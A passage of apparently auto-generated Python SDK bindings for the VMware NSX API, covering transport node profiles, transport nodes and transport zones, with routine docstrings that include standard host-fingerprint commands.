:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'transport_node_profile_id': transport_node_profile_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all transport node profiles.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.TransportNodeProfileListResult`
:return: com.vmware.nsx.model.TransportNodeProfileListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
transport_node_profile_id,
transport_node_profile,
esx_mgmt_if_migration_dest=None,
if_id=None,
ping_ip=None,
vnic=None,
vnic_migration_dest=None,
):
"""
When configurations of a transport node profile(TNP) is updated, all
the transport nodes in all the compute collections to which this TNP is
attached are updated to reflect the updated configuration.
:type transport_node_profile_id: :class:`str`
:param transport_node_profile_id: (required)
:type transport_node_profile: :class:`com.vmware.nsx.model_client.TransportNodeProfile`
:param transport_node_profile: (required)
:type esx_mgmt_if_migration_dest: :class:`str` or ``None``
:param esx_mgmt_if_migration_dest: The network ids to which the ESX vmk interfaces will be migrated
(optional)
:type if_id: :class:`str` or ``None``
:param if_id: The ESX vmk interfaces to migrate (optional)
:type ping_ip: :class:`str` or ``None``
:param ping_ip: IP Addresses to ping right after ESX vmk interfaces were migrated.
(optional)
:type vnic: :class:`str` or ``None``
:param vnic: The ESX vmk interfaces and/or VM NIC to migrate (optional)
:type vnic_migration_dest: :class:`str` or ``None``
:param vnic_migration_dest: The migration destinations of ESX vmk interfaces and/or VM NIC
(optional)
:rtype: :class:`com.vmware.nsx.model_client.TransportNodeProfile`
:return: com.vmware.nsx.model.TransportNodeProfile
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'transport_node_profile_id': transport_node_profile_id,
'transport_node_profile': transport_node_profile,
'esx_mgmt_if_migration_dest': esx_mgmt_if_migration_dest,
'if_id': if_id,
'ping_ip': ping_ip,
'vnic': vnic,
'vnic_migration_dest': vnic_migration_dest,
})
class TransportNodes(VapiInterface):
"""
"""
UPDATEMAINTENANCEMODE_ACTION_ENTER_MAINTENANCE_MODE = "enter_maintenance_mode"
"""
Possible value for ``action`` of method
:func:`TransportNodes.updatemaintenancemode`.
"""
UPDATEMAINTENANCEMODE_ACTION_FORCED_ENTER_MAINTENANCE_MODE = "forced_enter_maintenance_mode"
"""
Possible value for ``action`` of method
:func:`TransportNodes.updatemaintenancemode`.
"""
UPDATEMAINTENANCEMODE_ACTION_EXIT_MAINTENANCE_MODE = "exit_maintenance_mode"
"""
Possible value for ``action`` of method
:func:`TransportNodes.updatemaintenancemode`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.transport_nodes'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _TransportNodesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
transport_node,
):
"""
Transport nodes are hypervisor hosts and NSX Edges that will
participate in an NSX-T overlay. For a hypervisor host, this means that
it hosts VMs that will communicate over NSX-T logical switches. For NSX
Edges, this means that it will have logical router uplinks and
downlinks. This API creates transport node for a host node (hypervisor)
or edge node (router) in the transport network. When you run this
command for a host, NSX Manager attempts to install the NSX kernel
modules, which are packaged as VIB, RPM, or DEB files. For the
installation to succeed, you must provide the host login credentials
and the host thumbprint. To get the ESXi host thumbprint, SSH to the
host and run the **openssl x509 -in /etc/vmware/ssl/rui.crt
-fingerprint -sha256 -noout** command. To generate host key thumbprint
using SHA-256 algorithm please follow the steps below. Log into the
host, making sure that the connection is not vulnerable to a man in the
middle attack. Check whether a public key already exists. Host public
key is generally located at '/etc/ssh/ssh_host_rsa_key.pub'. If the key
is not present then generate a new key by running the following command
and follow the instructions. **ssh-keygen -t rsa** Now generate a
SHA256 hash of the key using the following command. Please make sure to
pass the appropriate file name if the public key is stored with a
different file name other than the default 'id_rsa.pub'. **awk '{print
$2}' id_rsa.pub | base64 -d | sha256sum -b | sed 's/ .\*$//' | xxd -r
-p | base64** This api is deprecated as part of FN+TN unification.
Please use Transport Node API to install NSX components on a node.
Additional documentation on creating a transport node can be found in
the NSX-T Installation Guide. In order for the transport node to
forward packets, the host_switch_spec property must be specified. Host
switches (called bridges in OVS on KVM hypervisors) are the individual
switches within the host virtual switch. Virtual machines are connected
to the host switches. When creating a transport node, you need to
specify if the host switches are already manually preconfigured on the
node, or if NSX should create and manage the host switches. You specify
this choice by the type of host switches you pass in the
host_switch_spec property of the TransportNode request payload. For a
KVM host, you can preconfigure the host switch, or you can have NSX
Manager perform the configuration. For an ESXi host or NSX Edge node,
NSX Manager always configures the host switch. To preconfigure the host
switches on a KVM host, pass an array of PreconfiguredHostSwitchSpec
objects that describes those host switches. In the current NSX-T
release, only one prefonfigured host switch can be specified. See the
PreconfiguredHostSwitchSpec schema definition for documentation on the
properties that must be provided. Preconfigured host switches are only
supported on KVM hosts, not on ESXi hosts or NSX Edge nodes. To allow
NSX to manage the host switch configuration on KVM hosts, ESXi hosts,
or NSX Edge nodes, pass an array of StandardHostSwitchSpec objects in
the host_switch_spec property, and NSX will automatically create host
switches with the properties you provide. In the current NSX-T release,
up to 5 host switches can be automatically managed. See the
StandardHostSwitchSpec schema definition for documentation on the
properties that must be provided. Note: previous versions of NSX-T used
a property named host_switches to specify the host switch configuration
on the transport node. That property is deprecated, but still
functions. You should configure new host switches using the
host_switch_spec property. The request should either provide
node_deployement_info or node_id. If the host node (hypervisor) or edge
node (router) is already added in system then it can be converted to
transport node by providing node_id in request. If host node
(hypervisor) or edge node (router) is not already present in system
then information should be provided under node_deployment_info.
:type transport_node: :class:`com.vmware.nsx.model_client.TransportNode`
:param transport_node: (required)
:rtype: :class:`com.vmware.nsx.model_client.TransportNode`
:return: com.vmware.nsx.model.TransportNode
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'transport_node': transport_node,
})
def delete(self,
transport_node_id,
force=None,
unprepare_host=None,
):
"""
Deletes the specified transport node. Query param force can be used to
force delete the host nodes. Force deletion of edge and public cloud
gateway nodes is not supported. It also removes the specified node
(host or edge) from system. If unprepare_host option is set to false,
then host will be deleted without uninstalling the NSX components from
the host.
:type transport_node_id: :class:`str`
:param transport_node_id: (required)
:type force: :class:`bool` or ``None``
:param force: Force delete the resource even if it is being used somewhere
(optional, default to false)
:type unprepare_host: :class:`bool` or ``None``
:param unprepare_host: Uninstall NSX components from host while deleting (optional,
default to true)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'transport_node_id': transport_node_id,
'force': force,
'unprepare_host': unprepare_host,
})
def deleteontransportnode(self,
target_node_id,
target_uri,
):
"""
Invoke DELETE request on target transport node
:type target_node_id: :class:`str`
:param target_node_id: Target node UUID (required)
:type target_uri: :class:`str`
:param target_uri: URI of API to invoke on target node (required)
:raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
Gateway Timeout
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('deleteontransportnode',
{
'target_node_id': target_node_id,
'target_uri': target_uri,
})
def disableflowcache(self,
transport_node_id,
):
"""
Disable flow cache for edge transport node. Caution: This involves
restart of the edge dataplane and hence may lead to network disruption.
:type transport_node_id: :class:`str`
:param transport_node_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('disableflowcache',
{
'transport_node_id': transport_node_id,
})
def enableflowcache(self,
transport_node_id,
):
"""
Enable flow cache for edge transport node. Caution: This involves
restart of the edge dataplane and hence may lead to network disruption.
:type transport_node_id: :class:`str`
:param transport_node_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('enableflowcache',
{
'transport_node_id': transport_node_id,
})
def get(self,
transport_node_id,
):
"""
Returns information about a specified transport node.
:type transport_node_id: :class:`str`
:param transport_node_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.TransportNode`
:return: com.vmware.nsx.model.TransportNode
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'transport_node_id': transport_node_id,
})
def getontransportnode(self,
target_node_id,
target_uri,
):
"""
Invoke GET request on target transport node
:type target_node_id: :class:`str`
:param target_node_id: Target node UUID (required)
:type target_uri: :class:`str`
:param target_uri: URI of API to invoke on target node (required)
:raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
Gateway Timeout
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('getontransportnode',
{
'target_node_id': target_node_id,
'target_uri': target_uri,
})
def list(self,
cursor=None,
in_maintenance_mode=None,
included_fields=None,
node_id=None,
node_ip=None,
node_types=None,
page_size=None,
sort_ascending=None,
sort_by=None,
transport_zone_id=None,
):
"""
Returns information about all transport nodes along with underlying
host or edge details. A transport node is a host or edge that contains
hostswitches. A hostswitch can have virtual machines connected to them.
Because each transport node has hostswitches, transport nodes can also
have virtual tunnel endpoints, which means that they can be part of the
overlay.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type in_maintenance_mode: :class:`bool` or ``None``
:param in_maintenance_mode: maintenance mode flag (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type node_id: :class:`str` or ``None``
:param node_id: node identifier (optional)
:type node_ip: :class:`str` or ``None``
:param node_ip: Fabric node IP address (optional)
:type node_types: :class:`str` or ``None``
:param node_types: a list of fabric node types separated by comma or a single type
(optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:type transport_zone_id: :class:`str` or ``None``
:param transport_zone_id: Transport zone identifier (optional)
:rtype: :class:`com.vmware.nsx.model_client.TransportNodeListResult`
:return: com.vmware.nsx.model.TransportNodeListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'in_maintenance_mode': in_maintenance_mode,
'included_fields': included_fields,
'node_id': node_id,
'node_ip': node_ip,
'node_types': node_types,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
'transport_zone_id': transport_zone_id,
})
def postontransportnode(self,
target_node_id,
target_uri,
):
"""
Invoke POST request on target transport node
:type target_node_id: :class:`str`
:param target_node_id: Target node UUID (required)
:type target_uri: :class:`str`
:param target_uri: URI of API to invoke on target node (required)
:raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
Gateway Timeout
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('postontransportnode',
{
'target_node_id': target_node_id,
'target_uri': target_uri,
})
def putontransportnode(self,
target_node_id,
target_uri,
):
"""
Invoke PUT request on target transport node
:type target_node_id: :class:`str`
:param target_node_id: Target node UUID (required)
:type target_uri: :class:`str`
:param target_uri: URI of API to invoke on target node (required)
:raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
Gateway Timeout
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('putontransportnode',
{
'target_node_id': target_node_id,
'target_uri': target_uri,
})
def refreshnodeconfiguration(self,
transport_node_id,
):
"""
The API is applicable for Edge transport nodes. If you update the VM
configuration and find a discrepancy in VM configuration at NSX
Manager, then use this API to refresh configuration at NSX Manager. It
refreshes the VM configuration from sources external to MP. Sources
include vSphere Server and the edge node. After this action, the API
GET api/v1/transport-nodes will show refreshed data.
:type transport_node_id: :class:`str`
:param transport_node_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('refreshnodeconfiguration',
{
'transport_node_id': transport_node_id,
})
def restartinventorysync(self,
transport_node_id,
):
"""
Restart the inventory sync for the node if it is currently internally
paused. After this action the next inventory sync coming from the node
is processed.
:type transport_node_id: :class:`str`
:param transport_node_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('restartinventorysync',
{
'transport_node_id': transport_node_id,
})
def restoreclusterconfig(self,
transport_node_id,
):
"""
A host can be overridden to have different configuration than Transport
Node Profile(TNP) on cluster. This action will restore such overridden
host back to cluster level TNP. This API can be used in other case.
When TNP is applied to a cluster, if any validation fails (e.g. VMs
running on host) then existing transport node (TN) is not updated. In
that case after the issue is resolved manually (e.g. VMs powered off),
you can call this API to update TN as per cluster level TNP.
:type transport_node_id: :class:`str`
:param transport_node_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('restoreclusterconfig',
{
'transport_node_id': transport_node_id,
})
def resynchostconfig(self,
transportnode_id,
):
"""
Resync the TransportNode configuration on a host. It is similar to
updating the TransportNode with existing configuration, but force synce
these configurations to the host (no backend optimizations).
:type transportnode_id: :class:`str`
:param transportnode_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('resynchostconfig',
{
'transportnode_id': transportnode_id,
})
def update(self,
transport_node_id,
transport_node,
esx_mgmt_if_migration_dest=None,
if_id=None,
ping_ip=None,
vnic=None,
vnic_migration_dest=None,
):
"""
Modifies the transport node information. The host_switch_name field
must match the host_switch_name value specified in the transport zone
(API: transport-zones). You must create the associated uplink profile
(API: host-switch-profiles) before you can specify an uplink_name here.
If the host is an ESX and has only one physical NIC being used by a
vSphere standard switch, TransportNodeUpdateParameters should be used
to migrate the management interface and the physical NIC into a logical
switch that is in a transport zone this transport node will join or has
already joined. If the migration is already done,
TransportNodeUpdateParameters can also be used to migrate the
management interface and the physical NIC back to a vSphere standard
switch. In other cases, the TransportNodeUpdateParameters should NOT be
used. When updating transport node you should follow pattern where you
should fetch the existing transport node and then only modify the
required properties keeping other properties as is. For API backward
compatibility, property host_switches will be still returned in
response and will contain the configuration matching the one in
host_switch_spec. In update call you should only modify configuration
in either host_switch_spec or host_switches, but not both. Property
host_switch_spec should be preferred over deprecated host_switches
property when creating or updating transport nodes. It also modifies
attributes of node (host or edge).
:type transport_node_id: :class:`str`
:param transport_node_id: (required)
:type transport_node: :class:`com.vmware.nsx.model_client.TransportNode`
:param transport_node: (required)
:type esx_mgmt_if_migration_dest: :class:`str` or ``None``
:param esx_mgmt_if_migration_dest: The network ids to which the ESX vmk interfaces will be migrated
(optional)
:type if_id: :class:`str` or ``None``
:param if_id: The ESX vmk interfaces to migrate (optional)
:type ping_ip: :class:`str` or ``None``
:param ping_ip: IP Addresses to ping right after ESX vmk interfaces were migrated.
(optional)
:type vnic: :class:`str` or ``None``
:param vnic: The ESX vmk interfaces and/or VM NIC to migrate (optional)
:type vnic_migration_dest: :class:`str` or ``None``
:param vnic_migration_dest: The migration destinations of ESX vmk interfaces and/or VM NIC
(optional)
:rtype: :class:`com.vmware.nsx.model_client.TransportNode`
:return: com.vmware.nsx.model.TransportNode
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'transport_node_id': transport_node_id,
'transport_node': transport_node,
'esx_mgmt_if_migration_dest': esx_mgmt_if_migration_dest,
'if_id': if_id,
'ping_ip': ping_ip,
'vnic': vnic,
'vnic_migration_dest': vnic_migration_dest,
})
def updatemaintenancemode(self,
transportnode_id,
action=None,
):
"""
Put transport node into maintenance mode or exit from maintenance mode.
:type transportnode_id: :class:`str`
:param transportnode_id: (required)
:type action: :class:`str` or ``None``
:param action: (optional)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('updatemaintenancemode',
{
'transportnode_id': transportnode_id,
'action': action,
})
class TransportZones(VapiInterface):
"""
"""
LIST_TRANSPORT_TYPE_OVERLAY = "OVERLAY"
"""
Possible value for ``transportType`` of method :func:`TransportZones.list`.
"""
LIST_TRANSPORT_TYPE_VLAN = "VLAN"
"""
Possible value for ``transportType`` of method :func:`TransportZones.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.transport_zones'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _TransportZonesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
transport_zone,
):
"""
Creates a new transport zone. The required parameters are
host_switch_name and transport_type (OVERLAY or VLAN). The optional
parameters are description and display_name.
:type transport_zone: :class:`com.vmware.nsx.model_client.TransportZone`
:param transport_zone: (required)
:rtype: :class:`com.vmware.nsx.model_client.TransportZone`
:return: com.vmware.nsx.model.TransportZone
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'transport_zone': transport_zone,
})
def delete(self,
zone_id,
):
"""
Deletes an existing transport zone.
:type zone_id: :class:`str`
:param zone_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'zone_id': zone_id,
})
def get(self,
zone_id,
):
"""
Returns information about a single transport zone.
:type zone_id: :class:`str`
:param zone_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.TransportZone`
:return: com.vmware.nsx.model.TransportZone
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'zone_id': zone_id,
})
def list(self,
cursor=None,
included_fields=None,
is_default=None,
page_size=None,
sort_ascending=None,
sort_by=None,
transport_type=None,
uplink_teaming_policy_name=None,
):
"""
Returns information about configured transport zones. NSX requires at
least one transport zone. NSX uses transport zones to provide
connectivity based on the topology of the underlying network, trust
zones, or organizational separations. For example, you might have
hypervisors that use one network for management traffic and a different
network for VM traffic. This architecture would require two transport
zones. The combination of transport zones plus transport connectors
enables NSX to form tunnels between hypervisors. Transport zones define
which interfaces on the hypervisors can communicate with which other
interfaces on other hypervisors to establish overlay tunnels or provide
connectivity to a VLAN. A logical switch can be in one (and only one)
transport zone. This means that all of a switch's interfaces must be in
the same transport zone. However, each hypervisor virtual switch (OVS
or VDS) has multiple interfaces (connectors), and each connector can be
attached to a different logical switch. For example, on a single
hypervisor with two connectors, connector A can be attached to logical
switch 1 in transport zone A, while connector B is attached to logical
switch 2 in transport zone B. In this way, a single hypervisor can
participate in multiple transport zones. The API for creating a
transport zone requires that a single host switch be specified for each
transport zone, and multiple transport zones can share the same host
switch.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type is_default: :class:`bool` or ``None``
:param is_default: Filter to choose if default transport zones will be returned
(optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:type transport_type: :class:`str` or ``None``
:param transport_type: Filter to choose the type of transport zones to return (optional)
:type uplink_teaming_policy_name: :class:`str` or ``None``
:param uplink_teaming_policy_name: The transport zone's uplink teaming policy name (optional)
:rtype: :class:`com.vmware.nsx.model_client.TransportZoneListResult`
:return: com.vmware.nsx.model.TransportZoneListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'is_default': is_default,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
'transport_type': transport_type,
'uplink_teaming_policy_name': uplink_teaming_policy_name,
})
def update(self,
zone_id,
transport_zone,
):
"""
Updates an existing transport zone. Modifiable parameters are
transport_type (VLAN or OVERLAY), description, and display_name. The
request must include the existing host_switch_name.
:type zone_id: :class:`str`
:param zone_id: (required)
:type transport_zone: :class:`com.vmware.nsx.model_client.TransportZone`
:param transport_zone: (required)
:rtype: :class:`com.vmware.nsx.model_client.TransportZone`
:return: com.vmware.nsx.model.TransportZone
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'zone_id': zone_id,
'transport_zone': transport_zone,
})
class TransportzoneProfiles(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.transportzone_profiles'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _TransportzoneProfilesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
transport_zone_profile,
):
"""
Creates a transport zone profile. The resource_type is required.
:type transport_zone_profile: :class:`vmware.vapi.struct.VapiStruct`
:param transport_zone_profile: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.TransportZoneProfile`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.TransportZoneProfile
The return value will contain all the attributes defined in
